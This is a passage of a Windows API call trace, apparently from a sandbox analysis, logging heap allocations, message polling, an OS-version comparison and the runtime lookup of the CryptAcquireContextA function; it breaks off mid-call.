HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.283] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.283] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0188.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.284] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.285] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0188.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.286] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0188.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0188.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0188.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0188.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.287] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.287] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.288] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.288] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.289] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.289] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.291] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0188.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.293] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0188.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0188.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.294] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.294] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 